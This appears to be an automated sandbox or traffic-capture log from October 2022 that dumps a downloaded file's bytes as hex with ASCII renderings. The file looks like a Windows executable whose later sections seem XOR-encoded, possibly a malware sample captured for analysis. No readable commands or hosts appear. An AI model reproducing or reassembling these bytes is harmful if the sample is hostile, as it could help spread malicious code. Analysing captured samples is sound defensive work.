                                                                                                                                  2022-10-17 20:07:22 UTC1289INData Raw: 59 59 85 c0 75 1f 57 33 db 53 56 e8 63 02 00 00 83 c4 0c 85 c0 74 0e 81 0f 00 01 00 00 39 5f 04 75 03 89 77 04 8b 07 c1 e8 02 f7 d0 83 e0 01 eb 05 33 c0 89 07 40 8b 4d fc 5f 5e 33 cd 5b e8 3b 97 fe ff c9 c2 04 00 8b ff 55 8b ec 81 ec f4 00 00 00 a1 18 20 43 00 33 c5 89 45 fc 53 56 8b 75 08 57 e8 e8 5a ff ff 8b d8 e8 e1 5a ff ff 56 8b b8 4c 03 00 00 e8 a2 00 00 00 59 8b 4b 60 8b f0 f7 d9 8d 85 0c ff ff ff 6a 78 1b c9 81 e1 02 f0 ff ff 50 81 c1 01 10 00 00 51 56 ff 15 d0 40 42 00 85 c0 75 05 21 07 40 eb 61 8d 85 0c ff ff ff 50 ff 73 50 e8 be c6 ff ff 59 59 8b 4b 60 85 c0 75 09 85 c9 75 32 57 6a 01 eb 20 85 c9 75 32 39 4b 5c 74 2d 8d 85 0c ff ff ff 50 ff 73 50 e8 94 c6 ff ff 59 59 85 c0 75 18 57 50 56 e8 82 01 00 00 83 c4 0c 85 c0 74 09 83 0f 04 89 77 04 89
                                                                                                                                  Data Ascii: YYuW3SVct9_uw3@M_^3[;U C3ESVuWZZVLYK`jxPQV@Bu!@aPsPYYK`uu2Wj u29K\t-PsPYYuWPVtw
                                                                                                                                  2022-10-17 20:07:22 UTC1297INData Raw: f6 ff ff 89 85 2c fe ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 97 e3 fe ff 83 c4 10 32 c0 e9 22 ff ff ff 83 a5 9c f6 ff ff 00 83 a5 2c fe ff ff 00 6a 00 eb 0f 33 c0 50 89 85 2c fe ff ff 89 85 9c f6 ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 58 e3 fe ff 83 c4 10 8b 8d 2c fe ff ff 8b bd 9c f8 ff ff 89 bd b8 f8 ff ff 85 c9 74 7a 83 a5 b4 f8 ff ff 00 33 ff 8b 84 bd 30 fe ff ff 6a 0a 5a f7 e2 03 85 b4 f8 ff ff 89 84 bd 30 fe ff ff 83 d2 00 47 89 95 b4 f8 ff ff 3b f9 75 d9 8b bd b8 f8 ff ff 85 d2 74 40 8b 85 2c fe ff ff 83 f8 73 73 0f 89 94 85 30 fe ff ff ff 85 2c fe ff ff eb 26 33 c0 50 89 85 9c f6 ff ff 89 85 2c fe ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 c8 e2 fe ff 83 c4 10 8d 85 5c fc ff ff 50 8d 85 2c fe ff ff 50 e8 c7
                                                                                                                                  Data Ascii: ,P0VP2",j3P,P0VPX,tz30jZ0G;ut@,ss0,&3P,P0VP\P,P
                                                                                                                                  2022-10-17 20:07:22 UTC1305INData Raw: 83 c2 14 89 54 24 08 89 54 24 04 89 14 24 e8 ba ed ff ff 83 c4 10 dd 44 24 04 c3 f3 0f 7e 44 24 04 66 0f f3 ca 66 0f 28 d8 66 0f c2 c1 06 3d ff 03 00 00 7c 25 3d 32 04 00 00 7f b0 66 0f 54 05 80 ec 42 00 f2 0f 58 c8 66 0f d6 4c 24 04 dd 44 24 04 c3 dd 05 c0 ec 42 00 c3 66 0f c2 1d a0 ec 42 00 06 66 0f 54 1d 80 ec 42 00 66 0f d6 5c 24 04 dd 44 24 04 c3 33 c0 50 50 6a 03 50 6a 03 68 00 00 00 40 68 c8 ec 42 00 ff 15 74 40 42 00 a3 60 2a 43 00 c3 8b 0d 60 2a 43 00 83 f9 fe 75 0b e8 d1 ff ff ff 8b 0d 60 2a 43 00 33 c0 83 f9 ff 0f 95 c0 c3 a1 60 2a 43 00 83 f8 ff 74 0c 83 f8 fe 74 07 50 ff 15 30 40 42 00 c3 8b ff 55 8b ec 56 6a 00 ff 75 10 ff 75 0c ff 75 08 ff 35 60 2a 43 00 ff 15 30 41 42 00 8b f0 85 f6 75 2d ff 15 80 40 42 00 83 f8 06 75 22 e8 b6 ff ff ff e8
                                                                                                                                  Data Ascii: T$T$$D$~D$ff(f=|%=2fTBXfL$D$BfBfTBf\$D$3PPjPjh@hBt@B`*C`*Cu`*C3`*CttP0@BUVjuuu5`*C0ABu-@Bu"
                                                                                                                                  2022-10-17 20:07:22 UTC1312INData Raw: 00 01 00 00 00 28 00 00 00 06 00 00 00 16 00 00 00 7b 00 00 00 02 00 00 00 57 00 00 00 16 00 00 00 21 00 00 00 27 00 00 00 d4 00 00 00 27 00 00 00 83 00 00 00 16 00 00 00 e6 03 00 00 0d 00 00 00 08 00 00 00 0c 00 00 00 15 00 00 00 0b 00 00 00 11 00 00 00 12 00 00 00 32 00 00 00 81 00 00 00 6e 00 00 00 05 00 00 00 61 09 00 00 10 00 00 00 e3 03 00 00 69 00 00 00 0e 00 00 00 0c 00 00 00 03 00 00 00 02 00 00 00 1e 00 00 00 05 00 00 00 29 11 00 00 16 00 00 00 d5 04 00 00 0b 00 00 00 19 00 00 00 05 00 00 00 20 00 00 00 0d 00 00 00 04 00 00 00 18 00 00 00 1d 00 00 00 05 00 00 00 13 00 00 00 0d 00 00 00 1d 27 00 00 0d 00 00 00 40 27 00 00 64 00 00 00 41 27 00 00 65 00 00 00 3f 27 00 00 66 00 00 00 35 27 00 00 67 00 00 00 19 27 00 00 09 00 00 00 45 27 00 00 6a 00
                                                                                                                                  Data Ascii: ({W!''2nai) '@'dA'e?'f5'g'E'j
                                                                                                                                  2022-10-17 20:07:22 UTC1320INData Raw: 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95
                                                                                                                                  Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                                                                                  2022-10-17 20:07:22 UTC1328INData Raw: 00 03 00 00 00 10 00 00 00 47 65 74 55 73 65 72 44 65 66 61 75 6c 74 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 00 07 00 00 00 10 00 00 00 03 00 00 00 10 00 00 00 49 73 56 61 6c 69 64 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 03 00 00 00 10 00 00 00 4c 43 4d 61 70 53 74 72 69 6e 67 45 78 00 00 00 04 00 00 00 10 00 00 00 4c 43 49 44 54 6f 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 00 03 00 00 00 10 00 00 00 4c 6f 63 61 6c 65 4e 61 6d 65 54 6f 4c 43 49 44 00 00 00 00 12 00 00 00 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 43 00 00 00 00 00 00 38 43 ff ff ff ff ff ff 0f 00 ff ff ff ff ff ff 0f 00 00 00 00 00 00 00 f0 3f 00 00 00 00 00 00 f0 3f ff ff ff ff ff ff
                                                                                                                                  Data Ascii: GetUserDefaultLocaleNameIsValidLocaleNameLCMapStringExLCIDToLocaleNameLocaleNameToLCIDAppPolicyGetProcessTerminationMethod8C8C??
                                                                                                                                  2022-10-17 20:07:22 UTC1336INData Raw: 00 2d 00 4d 00 4f 00 00 00 64 00 65 00 2d 00 4c 00 49 00 00 00 65 00 6e 00 2d 00 4e 00 5a 00 00 00 65 00 73 00 2d 00 43 00 52 00 00 00 66 00 72 00 2d 00 4c 00 55 00 00 00 62 00 73 00 2d 00 42 00 41 00 2d 00 4c 00 61 00 74 00 6e 00 00 00 00 00 73 00 6d 00 6a 00 2d 00 53 00 45 00 00 00 00 00 61 00 72 00 2d 00 4d 00 41 00 00 00 65 00 6e 00 2d 00 49 00 45 00 00 00 65 00 73 00 2d 00 50 00 41 00 00 00 66 00 72 00 2d 00 4d 00 43 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 4c 00 61 00 74 00 6e 00 00 00 00 00 73 00 6d 00 61 00 2d 00 4e 00 4f 00 00 00 00 00 61 00 72 00 2d 00 54 00 4e 00 00 00 65 00 6e 00 2d 00 5a 00 41 00 00 00 65 00 73 00 2d 00 44 00 4f 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 43 00 79 00 72 00 6c 00 00 00 00 00 73 00 6d 00 61 00 2d 00 53 00
                                                                                                                                  Data Ascii: -MOde-LIen-NZes-CRfr-LUbs-BA-Latnsmj-SEar-MAen-IEes-PAfr-MCsr-BA-Latnsma-NOar-TNen-ZAes-DOsr-BA-Cyrlsma-S
                                                                                                                                  2022-10-17 20:07:22 UTC1344INData Raw: 3f 00 00 00 00 40 d9 ef 3f 00 00 00 00 40 d8 ef 3f 00 00 00 00 40 d7 ef 3f 00 00 00 00 40 d6 ef 3f 00 00 00 00 40 d5 ef 3f 00 00 00 00 40 d4 ef 3f 00 00 00 00 40 d3 ef 3f 00 00 00 00 80 d2 ef 3f 00 00 00 00 80 d1 ef 3f 00 00 00 00 80 d0 ef 3f 00 00 00 00 80 cf ef 3f 00 00 00 00 80 ce ef 3f 00 00 00 00 80 cd ef 3f 00 00 00 00 80 cc ef 3f 00 00 00 00 80 cb ef 3f 00 00 00 00 80 ca ef 3f 00 00 00 00 80 c9 ef 3f 00 00 00 00 80 c8 ef 3f 00 00 00 00 80 c7 ef 3f 00 00 00 00 80 c6 ef 3f 00 00 00 00 80 c5 ef 3f 00 00 00 00 80 c4 ef 3f 00 00 00 00 80 c3 ef 3f 00 00 00 00 80 c2 ef 3f 00 00 00 00 80 c1 ef 3f 00 00 00 00 00 10 f0 3f 00 00 00 00 c0 0f f0 3f 00 00 00 00 80 0f f0 3f 00 00 00 00 40 0f f0 3f 00 00 00 00 00 0f f0 3f 00 00 00 00 c0 0e f0 3f 00 00 00 00 80 0e
                                                                                                                                  Data Ascii: ?@?@?@?@?@?@?@??????????????????????@???
                                                                                                                                  2022-10-17 20:07:22 UTC1369INData Raw: bf 71 d1 12 f9 df d1 33 bd 00 00 00 92 ec 3f 05 bf 3a 1a 91 52 ae a5 24 bd 00 00 00 40 ed df 04 bf dc 8e 9f 24 0f 05 3d bd 00 00 00 ec ed 7f 04 bf 0e 4b 92 dd 02 d1 27 bd 00 00 00 5c ee 3f 04 bf 81 d0 aa 7b 95 62 3e bd 00 00 00 02 ef df 03 bf a0 f2 24 45 ad 76 43 bd 00 00 00 a6 ef 7f 03 bf 49 e9 77 38 91 52 27 bd 00 00 00 46 f0 1f 03 bf 47 f8 5f 6a b2 2c 29 bd 00 00 00 e2 f0 bf 02 bf ae 2b 6a ec 42 da 44 bd 00 00 00 7c f1 5f 02 bf 0b 60 6b 05 e4 81 41 bd 00 00 00 12 f2 ff 01 bf 25 27 72 a7 0c 42 4c bd 00 00 00 a6 f2 9f 01 bf 09 bc 54 94 b9 1a 45 bd 00 00 00 06 f3 5f 01 bf 11 12 c6 fa 02 47 4f bd 00 00 00 96 f3 ff 00 bf e3 23 1e 69 bf cc 23 bd 00 00 00 20 f4 9f 00 bf 3b 8a de 5e d8 b7 48 bd 00 00 00 a8 f4 3f 00 bf 36 28 60 4a f9 94 4a bd 00 00 00 5c ea bf
                                                                                                                                  Data Ascii: q3?:R$@$=K'\?{b>$EvCIw8R'FG_j,)+jBD|_`kA%'rBLTE_GO#i# ;^H?6(`JJ\
                                                                                                                                  2022-10-17 20:07:22 UTC1377INData Raw: 00 80 fe 42 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 20 ff 42 00 00 57 45 00 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 a8 ff 42 00 70 01 43 00 74 ff 42 00 cc fe 42 00 80 fe 42 00 00 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 f0 01 43 00 00 00 00 00 01 00 00 00 04 00 00 00 24 02 43 00 9c 57 45 00 02 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 04 ff 42 00 00 00 00 00 00 00 00 00 02 00 00 00 14 ff 42 00 00 00 00 00 00 00 00 00 01 00 00 00 50 ff 42 00 00 00 00 00 00 00 00 00 00 00 00 00 44 57 45 00 c0 00 43 00 00 00 00 00 00 00 00 00 00 00 00 00 80 57 45 00 4c 00 43 00 0c 5a 45 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 44 fe 42 00 00 00 00 00 00 00 00 00 03 00 00 00 80 fd 42 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: B BWE@BpCtBBBC$CWE@BBPBDWECWELCZE@DBB
                                                                                                                                  2022-10-17 20:07:22 UTC1385INData Raw: 64 46 69 72 73 74 46 69 6c 65 45 78 57 00 00 8f 01 46 69 6e 64 4e 65 78 74 46 69 6c 65 57 00 8f 03 49 73 56 61 6c 69 64 43 6f 64 65 50 61 67 65 00 b5 01 47 65 74 41 43 50 00 00 9a 02 47 65 74 4f 45 4d 43 50 00 00 3a 02 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 00 ad 01 46 72 65 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 16 05 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 57 00 b7 02 47 65 74 50 72 6f 63 65 73 73 48 65 61 70 00 00 4e 05 53 65 74 53 74 64 48 61 6e 64 6c 65 00 00 51 03 48 65 61 70 53 69 7a 65 00 00 ce 00 43 72 65 61 74 65 46 69 6c 65 57 00 15 06 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 01 00
                                                                                                                                  Data Ascii: dFirstFileExWFindNextFileWIsValidCodePageGetACPGetOEMCP:GetEnvironmentStringsWFreeEnvironmentStringsWSetEnvironmentVariableWGetProcessHeapNSetStdHandleQHeapSizeCreateFileWWriteConsoleW
                                                                                                                                  2022-10-17 20:07:22 UTC1392INData Raw: 91 92 74 6b 91 0f 74 6b 80 06 07 2e 91 06 7e 61 91 19 6b e6 09 06 74 6a b4 d6 9e 6b 91 02 5c 21 91 06 7e 18 da 06 74 61 8e 1c 5c 0e 91 06 7e 43 f7 06 74 61 9a 19 69 e6 09 06 74 6a b4 d6 81 6b 91 02 5c 21 91 06 7e 18 da 06 74 61 8e 1c 5c 0e 91 06 7e 43 f7 06 74 61 9d 01 5c 26 91 06 7e 66 98 2a 7b 6b 97 01 5c 61 91 06 72 04 f6 06 74 61 91 06 7c 43 dc 06 74 61 82 02 65 6f bd 09 74 6d 99 2e 7e 6b 91 00 1b 0c 91 06 7e 6b 91 06 aa 6e b7 06 74 b5 91 00 67 6e ba 06 65 6e bb 07 64 6b 91 06 74 6c 91 86 f3 6b 94 12 74 6b 90 1d 44 69 91 bf 74 6b 91 0c 74 6b 80 06 07 2e 91 06 7e 61 91 04 07 03 91 06 7e 60 e2 6f 74 6b 9b 0a 7c 6c fe 6c 74 6b 9b 06 74 63 fe 6d 74 6b 9b 69 18 6b 91 0c 62 04 fc 06 74 61 fe 6a 74 6b 9b 69 1a 6b 91 0c 79 40 df 0f 1b 71 91 06 7e 1f b0 06 74
                                                                                                                                  Data Ascii: tktk.~aktjk\!~ta\~Ctaitjk\!~ta\~Cta\&~f*{k\arta|Ctaeotm.~k~kntgnendktlktkDitktk.~a~`otk|lltktcmtkikbtajtkiky@q~t
                                                                                                                                  2022-10-17 20:07:22 UTC1400INData Raw: 85 f8 72 0a 91 06 72 18 ef 06 74 6d 33 23 6b 67 85 f8 72 09 91 06 72 18 ef 06 74 6d 33 23 6b 66 85 f8 72 08 91 06 72 18 ef 06 74 6d 33 23 6b 65 85 f8 72 30 91 06 72 18 ef 06 74 6d 33 2e f7 6b 91 00 74 77 1c 08 74 6b 93 23 62 7f 6f 00 20 6b 91 00 07 15 91 06 72 c9 b4 11 60 95 97 54 74 6b 97 75 0a 6b 91 00 d6 4e 89 12 8a 6d c0 06 74 6d e2 78 74 6b 97 a4 51 72 85 f8 72 3b 91 06 72 18 ef 06 74 6d 33 23 6e 7f 6f 00 3b 6b 91 00 07 15 91 06 72 c9 b4 1d 60 95 97 55 74 6b 97 75 0a 6b 91 00 d6 43 14 06 74 6d 91 00 07 ab 91 06 7e 16 aa 07 74 6f b9 84 74 6b 97 00 8a 6d 0d 04 74 6d e2 c7 74 6b 9b 2e 67 6b 91 2d 5c 7f 91 06 5f 43 12 06 74 6d 91 2e f0 6b 91 00 72 95 97 9b 76 6b 97 75 b5 6b 91 0c 5c 78 91 06 5f 43 85 06 74 40 b9 83 74 6b 97 06 5e 6b 91 15 44 68 91 08 74
                                                                                                                                  Data Ascii: rrtm3#kgrrtm3#kfrrtm3#ker0rtm3.ktwtk#bo kr`TtkukNmtmxtkQrr;rtm3#no;kr`UtkukCtm~totkmtmtk.gk-\_Ctm.krvkuk\x_Ct@tk^kDht
                                                                                                                                  2022-10-17 20:07:22 UTC1408INData Raw: ba 0c 74 79 98 2e 3d 6b 91 0c 59 bc 4f 09 66 62 6f 10 7c 6b 91 1d 1b 7d 91 06 7e 6b 4d 17 7c 78 9d 17 78 47 92 06 5f 79 91 01 65 6d 92 02 5c e6 91 06 72 43 8a 06 74 40 9a 06 65 6e fe 11 74 6b 9b 3c 06 94 6e f9 aa 66 80 03 58 63 80 03 1b 7d 91 06 7e 6b 4d 06 aa 6e b7 06 74 b5 91 06 74 6f 82 0b 62 78 9f 2d 53 7a 9c 17 7a f1 82 09 74 6b 96 04 65 64 b9 eb 74 6b 9b 2e 6f 6b 91 2d 7f 6b 4f 03 52 6b 91 d8 74 6b 80 08 63 33 82 08 65 65 80 0b fa 02 a3 d7 73 78 81 2d 74 7a 81 2c 74 6b 91 07 40 6b 91 04 74 bf 91 2b 75 6a 9e 06 74 6b 91 04 74 cd 91 93 4f 6a 9c 06 74 6b 91 06 74 f8 91 be 3f 6a 94 12 74 6b 90 06 74 09 90 15 01 6a 94 12 74 6b 90 15 44 68 91 41 74 6b 91 1f 74 6b 80 06 70 04 a2 06 74 61 fe 32 74 6b 9b 19 6e 43 f4 06 74 61 e3 23 77 6b e1 2e 4f 6b 91 0c 0a
                                                                                                                                  Data Ascii: ty.=kYOfbo|k}~kM|xxG_yem\rCt@entk<nfXc}~kMnttobx-Szztkedtk.ok-kORktkc3eesx-tz,tk@kt+ujtktOjtkt?jtktjtkDhAtktkpta2tknCta#wk.Ok
                                                                                                                                  2022-10-17 20:07:22 UTC1416INData Raw: 82 00 4c e3 91 06 74 6b 80 00 63 32 92 f8 70 7d 6f 07 67 67 80 0a 58 2d 91 00 65 6e 93 7d 7b 6b 91 02 65 6d 00 0f 63 32 8e 19 2b 08 b1 f9 74 6b 91 0f 6b 74 ce 65 2b 69 ea 09 74 6b 95 17 72 7c c8 97 65 6f 8e 19 2b 09 f1 d4 e8 62 86 5e 79 7a 94 11 2c 78 94 17 70 7c c8 15 70 6b ba 2c 7c 7d 6f 07 67 66 80 0b 58 4b 97 17 71 69 ea 09 74 6b 95 17 72 fa 98 11 2d 74 8e 59 17 4b 6e 06 74 6b 98 19 6b 34 f2 59 a6 f7 80 00 61 33 82 00 74 7a 97 05 8a 6f 87 f8 75 78 9f 17 7a 51 f6 f9 8b 94 97 10 5c 60 90 06 7e 78 99 d8 7c 4d 91 10 1e 78 99 d8 74 7a 99 2c 74 6b 91 47 68 6b 91 06 74 6b 91 07 74 6b 91 33 75 6b 91 30 75 6b 91 0e 74 6b 91 12 74 6b 90 15 44 69 91 08 74 6b 91 19 74 6b 80 06 76 7c fb 59 63 01 6f 07 7e 40 91 00 5e 6b 91 15 44 69 91 14 74 6b 91 4b 74 6b 80 06 76
                                                                                                                                  Data Ascii: Ltkc2p}oggX-en}{kemc2+tkkte+itkr|eo+b^yz,xp|pk,|}ogfXKqitkr-tYKntkk4Ya3tzouxzQ\`~x|Mxtz,tkGhktktk3uk0uktktkDitktkv|Yco~@^kDitkKtkv
                                                                                                                                  2022-10-17 20:07:22 UTC1424INData Raw: 91 04 74 52 91 c6 8d 6b 9a 06 74 6b 91 04 74 5a 91 d0 73 6a 9a 06 74 6b 91 06 74 7d 91 f9 61 6a 94 12 74 6b 90 1d 44 68 91 7f 74 6b 91 6c 74 6b 80 06 74 6b 91 2e ec 6a 91 0c 59 6c e3 f6 40 6b e1 2d 71 19 69 32 74 1b 9b 06 aa 60 b7 06 06 6b a4 06 04 61 91 d8 74 19 99 33 74 1b e3 64 41 6b e1 2e 92 6b 91 00 7f 19 99 33 74 1b e3 7c 41 6b e1 2e 92 6b 91 00 78 6c b9 30 74 6b 9b 10 8a 6a 9c 0f 58 7a 91 01 06 4a 92 06 04 6d b9 74 74 6b 9b 15 70 b5 83 06 aa 6d 82 03 74 6b 4f 06 0a 45 91 06 7e 78 95 2d 74 7a 95 2c 74 6b 91 07 68 6b 91 06 74 68 91 1e 6f 6b 9a 1f 74 6b 90 06 74 6a 91 60 13 6b 97 1f 74 6b 90 1d 44 69 91 3e 74 6b 91 6d 74 6b 80 06 74 15 16 07 74 61 93 69 89 6b 91 0c 7e 6d bc 05 60 40 9d 00 77 43 6f 06 74 61 fe a0 74 6b 9b 23 59 6d b7 78 5a 6b 91 0c 7f
                                                                                                                                  Data Ascii: tRktktZsjtkt}ajtkDhtkltktk.jYl@k-qi2t`kat3tdAk.k3t|Ak.kxl0tkjXzJmttkpmtkOE~x-tz,tkhkthoktktj`ktkDi>tkmtkttaik~m`@wCotatk#YmxZk
                                                                                                                                  2022-10-17 20:07:22 UTC1432INData Raw: ec b1 74 6b 95 06 4c c3 91 06 74 68 fe e6 75 6b 9b 19 5a 5a 8e 05 1b 8b 90 06 7e 74 cf 29 61 68 fe e7 75 6b 9b 10 45 67 92 69 95 6a 91 0c 6b 74 6f 02 5f 6a 87 0d 73 47 88 06 76 7d ec b3 74 6b 95 04 63 16 27 06 74 6f 93 10 09 dc 91 06 70 6b ba 67 77 04 71 07 74 61 8e 5b 45 49 92 69 94 6a 91 0c 54 fd 91 06 74 44 84 05 1b 8a 90 06 7e 7d a0 0a 77 04 70 07 74 61 8e 19 8a 6f ba 07 62 67 99 2a 6d 6b 93 10 09 de 91 06 70 69 87 7b c2 6b 91 02 76 7c ec b1 74 6b 95 06 5f 7c 91 04 62 16 24 06 74 6f 93 10 09 dd 91 06 70 69 87 7b c3 6b 91 02 74 69 b9 a7 75 6b 9b 06 5e f1 91 04 77 43 24 07 74 61 91 04 62 16 24 06 74 6f 93 10 09 dd 91 06 70 69 87 7b c3 6b 91 02 76 43 30 07 74 61 91 2c 16 6b 93 05 5c d8 90 06 7e 6b 93 2e c6 6a 91 0c 52 69 b9 a7 75 6b 9b 06 5e 6b 91 15 44
                                                                                                                                  Data Ascii: tkLthukZZ~t)ahukEgijkto_jsGv}tkc'topkgwqta[EIijTtD~}wptaobg*mkpi{kv|tk_|b$topi{ktiuk^wC$tab$topi{kvC0ta,k\~k.jRiuk^kD
                                                                                                                                  2022-10-17 20:07:22 UTC1439INData Raw: bd 28 74 d5 dd 66 37 49 91 ff 52 d1 a1 24 74 58 b7 bc 44 49 91 3c 53 d1 a1 24 74 8a c1 bc 44 49 91 76 5d d1 a1 28 74 cc d6 66 37 45 91 3c 4c 0b d2 18 74 e4 da ea 58 45 91 1e 58 0b d2 28 74 35 a3 66 37 45 91 78 52 0b d2 28 74 cb a1 66 37 45 91 eb 44 0b d2 28 74 f7 a1 66 37 45 91 70 49 0b d2 28 74 49 d3 66 37 49 91 2b 5d d1 a1 28 74 e0 df 66 37 45 91 b2 3d 0b d2 28 74 3c d3 66 37 45 91 30 36 0b d2 18 74 54 da 13 39 61 91 50 55 0d a9 00 74 b0 bd 15 46 6d 91 4a 43 97 86 00 74 cc a9 15 46 6d 91 74 30 3f ae 00 74 b5 df 15 46 6d 91 78 55 78 a3 00 74 c6 bc fa 63 6d 91 fb 55 97 86 00 74 99 da 15 46 6d 91 f2 37 78 a3 00 74 96 d8 15 46 e8 93 9e 4d 6b 91 08 74 94 a9 44 45 65 91 4a 3d 29 a0 08 74 7c dd 44 45 6d 91 78 50 78 a3 00 74 fa b0 15 46 5d 91 e9 4d a3 a8 0c 74
                                                                                                                                  Data Ascii: (tf7IR$tXDI<S$tDIv](tf7E<LtXEX(t5f7ExR(tf7ED(tf7EpI(tIf7I+](tf7E=(t<f7E06tT9aPUtFmJCtFmt0?tFmxUxtcmUtFm7xtFMktDEeJ=)t|DEmxPxtF]Mt
                                                                                                                                  2022-10-17 20:07:22 UTC1447INData Raw: 32 06 74 6b 91 90 74 14 af df 69 36 90 66 d3 6b 91 06 74 fd 91 1e 57 8a 8c 5b 75 d3 39 06 74 6b 91 90 74 3a d2 df 69 35 90 aa de 6b 91 06 74 fd 91 94 4b b2 8c 58 75 7f 3a 06 74 6b 91 90 74 9d de 36 71 35 90 82 d8 6b 91 06 74 fd 91 5c 47 5b 94 58 75 43 3c 06 74 6b 91 95 74 a4 90 28 75 35 90 7a d9 6b 91 06 74 ed 99 6a 70 7e 90 66 75 ef 3c 06 74 6b 91 80 7c 1f 95 16 74 0b 90 8b d9 6b 91 06 74 ed 99 01 73 7e 90 67 75 fe 3c 06 74 6b 91 80 7c 64 96 16 74 0a 90 98 d9 6b 91 06 74 ed 89 3e 4a 6a 91 64 75 cc 3c 06 74 6b 91 80 7c 07 95 13 75 09 90 a9 d9 6b 91 06 74 ed 99 72 70 7b 91 64 75 d3 3c 06 74 6b 91 80 7c 6c 96 13 75 08 90 c6 d9 6b 91 06 74 ed 99 09 73 7b 91 65 75 a2 3c 06 74 6b 91 80 7c 7c 98 ed 69 0f 90 d7 d9 6b 91 06 74 ed 99 19 7d 9e 8c 62 75 b1 3c 06 74
                                                                                                                                  Data Ascii: 2tkti6fktW[u9tkt:i5ktKXu:tkt6q5kt\G[XuC<tkt(u5zktjp~fu<tk|tkts~gu<tk|dtkt>Jjdu<tk|uktrp{du<tk|lukts{eu<tk||ikt}bu<t
                                                                                                                                  2022-10-17 20:07:22 UTC1455INData Raw: 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 fe a4 06 74 69 91 0c 36 6b 91 05 74 42 d8 06 74 6a 91 93 41 6b 91 04 74 61 d3 06 74 68 91 2f 3d 6b 91 07 74 64 d6 06 74 69 91 52 6a 6b 91 07 74
                                                                                                                                  Data Ascii: tBtjAktath/=ktti6ktBtjAktath/=ktti6ktBtjAktath/=ktti6ktBtjAktath/=ktti6ktBtjAktath/=ktti6ktBtjAktath/=ktti6ktBtjAktath/=ktdtiRjkt
                                                                                                                                  2022-10-17 20:07:22 UTC1463INData Raw: 99 fd 74 c8 b2 cf 7c 90 91 85 57 82 99 fd 74 f8 b2 0f 7d 90 91 a5 57 4a 98 05 75 bd 87 22 7d c8 91 d0 62 42 98 fd 74 e8 b2 47 7d 68 90 d0 62 22 98 fd 74 f8 b2 6f 7d 90 91 a5 57 ea 98 05 75 70 b4 8f 7d 90 91 b5 57 ca 98 05 75 41 b4 af 7d 90 91 c5 57 aa 98 05 75 52 b4 cf 7d 90 91 85 57 8a 98 05 75 23 b4 ef 7d 90 91 95 57 6a 9b 05 75 3c b4 05 7e 28 90 f1 5c 62 9b fd 74 c8 b2 27 7e f8 91 d0 62 4a 9b 9d 74 79 b4 2f 7e 90 91 b5 57 2a 9b 95 74 bd 87 47 7e f0 91 14 51 22 9b fd 74 e8 b2 67 7e f8 91 d0 62 0a 9b 9d 74 79 b4 65 7e f8 91 d0 62 02 9b fd 74 f8 b2 87 7e f8 91 d0 62 ea 9b 9d 74 79 b4 85 7e f8 91 d0 62 e2 9b fd 74 c8 b2 